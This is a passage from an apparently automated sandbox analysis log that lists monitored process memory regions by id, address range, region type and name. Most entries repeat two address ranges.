filename = "" Region: id = 8392 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8393 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8394 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8395 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8396 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8397 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8398 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8399 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8400 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8401 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8402 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8403 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8404 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8405 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8406 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8407 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8408 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8409 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8410 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8411 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8412 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8413 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8414 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8415 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8416 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8417 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8418 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8419 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8420 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8421 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8422 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8423 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8424 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8425 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8426 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8427 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8428 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8429 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8430 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8431 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8432 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8433 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8434 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8435 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8436 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8437 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8438 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8439 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8440 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8441 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8442 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8443 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8444 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8445 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8446 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8447 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8448 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8449 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8450 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8451 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8452 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8453 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8454 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8455 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8456 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8457 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8458 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8459 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8460 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8461 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8462 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8463 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8464 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8465 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8466 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8467 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8468 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8469 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8470 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8471 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8472 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8473 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8474 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8475 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8476 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8477 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8478 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8479 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8480 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8481 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8482 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8483 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8484 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8485 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8486 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8487 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8488 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8489 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8490 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8491 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8492 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8493 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8494 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8495 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8496 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8497 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8498 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8499 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8500 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8501 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8502 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8503 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8504 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8505 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8506 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8507 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8508 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8509 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8510 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8511 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8512 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8513 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8514 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8515 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8516 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8517 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8518 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8519 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8520 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8521 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8522 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8523 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8524 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8525 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8526 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8527 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8528 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8529 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8530 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8531 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8532 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8533 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8534 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8535 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8536 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8537 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8538 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8539 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8540 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8541 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8542 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8543 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8544 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8545 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8546 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8547 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8548 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8549 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8550 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8551 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8552 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8553 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8554 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8555 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8556 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8557 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8558 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8559 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8560 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8561 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8562 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8563 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8564 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8565 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8566 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8567 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8568 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8569 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8570 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8571 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8572 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8573 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8574 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8575 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8576 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8577 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8578 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8579 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 